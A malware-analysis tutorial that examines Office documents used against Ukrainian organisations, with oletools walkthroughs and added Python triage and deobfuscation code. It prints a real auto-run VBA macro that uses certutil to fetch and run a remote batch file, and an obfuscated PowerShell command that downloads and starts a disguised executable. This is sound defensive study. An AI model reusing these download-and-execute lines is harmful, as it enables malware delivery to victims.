How to analyze malicious documents — Case study
We will be doing analysis on Microsoft documents used in real life attacks. The document is a .docx file that was used to attack Ukrainian organizations in the context of the military conflict between Russia and Ukraine.
Tools Used:
- oleid
- exiftool
- olevba
- Oledump
- AnyRun
Introduction
Types of Microsoft Office File Formats
When collecting files that could be related to an incident, you might notice that many files contain various extensions (.txt, .dotm, .zip, .docx, .pdf) which belong to different applications. For the purpose of this blog, we will focus on the three main types of file formats in Microsoft Office: Word, Excel, and PowerPoint. First, let’s explain the structure of these files and how they differ from one another. [1]
Object Linking and Embedding (OLE)
OLE2 format was used in Microsoft Word 97–2003 documents and other Microsoft products such as Outlook messages. The well-known file extensions .doc, .xls and .ppt are all file types based on the OLE format. An OLE file is a compound file and it is structured as a file system within a file. OLE files are formatted as ZIP and the contents of the file can be viewed using oledir utility (this is part of oletools which will be explained later in this post). The OLE file contains:
- Streams of data where each stream has a name. A file must contain at least one stream. For example, for Word documents, it is mandatory to contain a stream called WordDocument, which is the main stream that contains the document text.
- Storages that contain streams or other storages.
- Properties that are streams containing information about the document, such as author, title, creation, and modification date. Property stream names always start with \x05.
Office Open XML (OOXML)
This file format was incorporated into Microsoft Office 2007. It is a zipped XML-based format developed by Microsoft and used for all Microsoft Office files. The associated extensions include .docx, .xlsx and .pptx. OOXML files are structured in a similar way to OLE files but there are several differences between them:
- Each directory in the OOXML file contains a .xml file that can be seen in the screenshot below.
- A file called [Content_Types].xml must be in the root directory of the archive. It contains all of the content types included in the archive.
- OOXML files cannot contain VBA macros (we will elaborate on this in the next section).
- OOXML files can contain any kind of object, including images, OLE objects[1], PE files, media files, and more.
- Relationships between objects are described in the files with .rels extension.
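As an added illustration of the package layout described in the OLE and OOXML sections above (this is my own example, not code from the original post or from oletools), the following Python builds a constructed minimal OOXML package in memory and triages it: it checks that [Content_Types].xml sits at the archive root, flags parts whose content type marks a VBA project, detects embedded OLE2 compound files by their signature, and lists the relationships recorded in each .rels file. The namespace URIs and the vbaProject content type are the standard OOXML values; the sample package is constructed test data.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"  # content type of the macro container
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE2 compound-file signature


def build_sample_package(with_macro: bool) -> bytes:
    """Constructed minimal OOXML package (test data built here, not a real sample)."""
    types = ['<Types xmlns="%s">' % CT_NS[1:-1],
             '<Override PartName="/word/document.xml" ContentType="application/xml"/>']
    rels = ['<Relationships xmlns="%s">' % REL_NS[1:-1],
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>']
    if with_macro:
        types.append('<Override PartName="/word/vbaProject.bin" ContentType="%s"/>' % VBA_CONTENT_TYPE)
        rels.append('<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "\n".join(types + ["</Types>"]))
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", "\n".join(rels + ["</Relationships>"]))
        if with_macro:  # a VBA project is itself an OLE2 compound file stored inside the zip
            z.writestr("word/vbaProject.bin", OLE_MAGIC + b"\x00" * 24)
    return buf.getvalue()


def triage_ooxml(data: bytes) -> dict:
    """List parts, flag macro containers via [Content_Types].xml, OLE parts via magic, and walk .rels."""
    findings = {"parts": [], "vba_parts": [], "ole_parts": [], "relationships": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if "[Content_Types].xml" not in names:
            raise ValueError("not an OOXML package: [Content_Types].xml missing from archive root")
        findings["parts"] = sorted(names)
        for ov in ET.fromstring(z.read("[Content_Types].xml")).iter(CT_NS + "Override"):
            if ov.get("ContentType") == VBA_CONTENT_TYPE:
                findings["vba_parts"].append(ov.get("PartName"))
        for name in names:
            if name.endswith(".rels"):  # relationships between parts live in .rels files
                for rel in ET.fromstring(z.read(name)).iter(REL_NS + "Relationship"):
                    findings["relationships"].append((name, rel.get("Type").rsplit("/", 1)[-1], rel.get("Target")))
            elif z.read(name).startswith(OLE_MAGIC):
                findings["ole_parts"].append(name)
    return findings
```

Run triage_ooxml(build_sample_package(with_macro=True)) to see the macro container reported both by content type and by OLE signature; the same function raises on a zip that is not an OOXML package.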
Technical analysis
Part 1
Malicious Document Sample: https://bazaar.abuse.ch/sample/c2672e6fd55b129125a19c7837943c0844c03ec02dcf165af183f9e4df4dccbc/
Let's use exiftool to see the metadata:
The oleid tool is used to determine if the file contains any macros:
The olevba tool is utilized to obtain more information about the VBA macros found:
As we can see above, the tool detected a malicious macro that will run when macros are enabled.
Oledump is a program to analyze OLE files:
Macro code extracted with oledump (python oledump/oledump.py malware.xlsm -s A4 -v):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
PID = Shell("cmd /c certutil.exe -urlcache -split -f ""http://3.112.243.28/net/Ugrfa.bat"" Opcbuyjhg.exe.exe && Opcbuyjhg.exe.exe", vbHide)
End Sub
The legitimate certutil.exe executable is used to download a malicious binary (Ugrfa.bat) from a remote server and run it.
ViperMonkey is a VBA emulation engine that can be used to analyze and deobfuscate malicious VBA macros.
The tool was able to detect the entry point function (workbook_open) and the routine responsible for downloading a malicious executable.
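The indicators that olevba and ViperMonkey reported for this sample can be reproduced with a small static scan. The following Python is an added example, not part of the original post or of oletools: it takes a constructed copy of the macro source shown above and flags auto-execution entry points, execution calls, living-off-the-land binaries and network IOCs. The indicator lists are my own assumption of what is worth flagging, modelled on the categories olevba reports.

```python
import re

# Constructed copy of the macro recovered with oledump above; the only identifiers are those on the page.
SAMPLE_VBA = r'''Attribute VB_Name = "ThisWorkbook"
Private Sub Workbook_Open()
PID = Shell("cmd /c certutil.exe -urlcache -split -f ""http://3.112.243.28/net/Ugrfa.bat"" Opcbuyjhg.exe.exe && Opcbuyjhg.exe.exe", vbHide)
End Sub
'''

# Assumed indicator lists (my selection, modelled on the categories olevba reports).
AUTOEXEC = {"workbook_open", "document_open", "autoopen", "auto_open", "workbook_activate"}
EXEC_CALLS = ("Shell", "CreateObject", "WScript.Shell", "ShellExecute")
LOLBINS = ("certutil", "powershell", "mshta", "bitsadmin", "rundll32", "wscript", "cscript")


def scan_vba(source):
    """Return (category, value) indicators found in VBA source text."""
    indicators = []
    # Entry points that fire without user interaction once macros are enabled
    for m in re.finditer(r"\bSub\s+(\w+)\s*\(", source):
        if m.group(1).lower() in AUTOEXEC:
            indicators.append(("AutoExec", m.group(1)))
    for call in EXEC_CALLS:
        if re.search(r"\b" + re.escape(call) + r"\b", source, re.I):
            indicators.append(("Suspicious", call))
    for lolbin in LOLBINS:
        if re.search(r"\b" + lolbin + r"(\.exe)?\b", source, re.I):
            indicators.append(("LOLBin", lolbin))
    if re.search(r"\bvbHide\b", source):  # hidden window for the spawned process
        indicators.append(("Suspicious", "vbHide"))
    for url in re.findall(r"https?://[^\s\"']+", source):
        indicators.append(("IOC", url))
    for ip in sorted(set(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", source))):
        indicators.append(("IOC", ip))
    return indicators


def verdict(indicators):
    """Auto-exec plus an execution primitive or LOLBin is the pattern seen in this sample."""
    kinds = {k for k, _ in indicators}
    if "AutoExec" in kinds and kinds & {"Suspicious", "LOLBin"}:
        return "malicious-likely"
    return "review"
```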
Part 2
Malicious file: https://bazaar.abuse.ch/sample/992df82cf31a91acd034411bb43a1ec127fa15d613b108287384882807f81764/#iocs
exiftool analysis:
oleid analysis:
Oleid is used to investigate the file, which doesn’t contain any VBA macros.
oledump can be used to find the objects embedded:
The 7z tool is used to decompress the file.
After that, we can verify the embedded object by dumping its resource section.
Let's run this on AnyRun and interact with the object there.
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\GSU207@POLICE.GOV.UA - Повідомлення (15).js"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [NeT.seRvIcepOiNtmanAgER]::sECURITyPROToCOL = [neT.SEcurITypRotOcoLType]::Tls12 ; Irm -uRI ("https://c" + "dn.discordapp.com/attachme" + "nts/932413459872747544/93829197773526634" + "4/p" + "utty.ex" + "e" ) -outfilE "$enV:PuBLICGoogleChromeUpdate.exe" ; sTArt-pRoceSs "$eNV:pUBLIcGoogleChromeUpdate.exe"
We need to look at the .js file now.
The .js launches PowerShell with the following command line:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [NeT.seRvIcepOiNtmanAgER]::sECURITyPROToCOL = [neT.SEcurITypRotOcoLType]::Tls12 ; Irm -uRI ("https://c" + "dn.discordapp.com/attachme" + "nts/932413459872747544/93829197773526634" + "4/p" + "utty.ex" + "e" ) -outfilE "$enV:PuBLICGoogleChromeUpdate.exe" ; sTArt-pRoceSs "$eNV:pUBLIcGoogleChromeUpdate.exe"
The PowerShell command downloads the .exe (the URL is split into concatenated string fragments and the cmdlet names use randomised casing to evade simple string matching) and then executes it.
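To recover the download URL from the obfuscated PowerShell command captured above, the following Python (an added example, not from the original post; it assumes straight quotes, as the sandbox would capture them) folds the concatenated string literals, lower-cases the case-randomised tokens outside string literals, expands the Irm alias, and then extracts the URL, the output file and the executed path. The alias table is my own assumption of which aliases matter for this kind of downloader.

```python
import re

# Constructed copy of the PowerShell command line captured in the sandbox above, with straight quotes.
SAMPLE_CMD = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    '[NeT.seRvIcepOiNtmanAgER]::sECURITyPROToCOL = [neT.SEcurITypRotOcoLType]::Tls12 ; '
    'Irm -uRI ("https://c" + "dn.discordapp.com/attachme" + "nts/932413459872747544/93829197773526634" '
    '+ "4/p" + "utty.ex" + "e" ) -outfilE "$enV:PuBLICGoogleChromeUpdate.exe" ; '
    'sTArt-pRoceSs "$eNV:pUBLIcGoogleChromeUpdate.exe"'
)

STRING_CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')
# Assumed alias table: only the aliases worth expanding for a downloader like this one.
ALIASES = {"irm": "Invoke-RestMethod", "iwr": "Invoke-WebRequest",
           "iex": "Invoke-Expression", "saps": "Start-Process"}


def join_concatenated_strings(cmd):
    """Fold "a" + "b" into "ab" until no concatenation is left, revealing the split URL."""
    prev = None
    while prev != cmd:
        prev, cmd = cmd, STRING_CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', cmd)
    return cmd


def normalize(cmd):
    """PowerShell is case-insensitive, so random casing outside string literals carries no meaning."""
    parts = re.split(r'("[^"]*")', cmd)  # odd indices are the string literals, left untouched
    for i in range(0, len(parts), 2):
        parts[i] = re.sub(r"\b([a-z]+)\b", lambda m: ALIASES.get(m.group(1), m.group(1)), parts[i].lower())
    return "".join(parts)


def extract_downloader(cmd):
    """Return the normalized command plus the download URL, output file and executed path."""
    cmd = normalize(join_concatenated_strings(cmd))
    outfile = re.search(r'-outfile\s+"([^"]+)"', cmd)
    started = re.search(r'start-process\s+"([^"]+)"', cmd)
    return {
        "normalized": cmd,
        "urls": re.findall(r'https?://[^\s"\']+', cmd),
        "outfile": outfile.group(1) if outfile else None,
        "executed": started.group(1) if started else None,
    }
```

The environment-variable paths are reproduced exactly as the sandbox captured them; only the casing of the surrounding tokens is normalised.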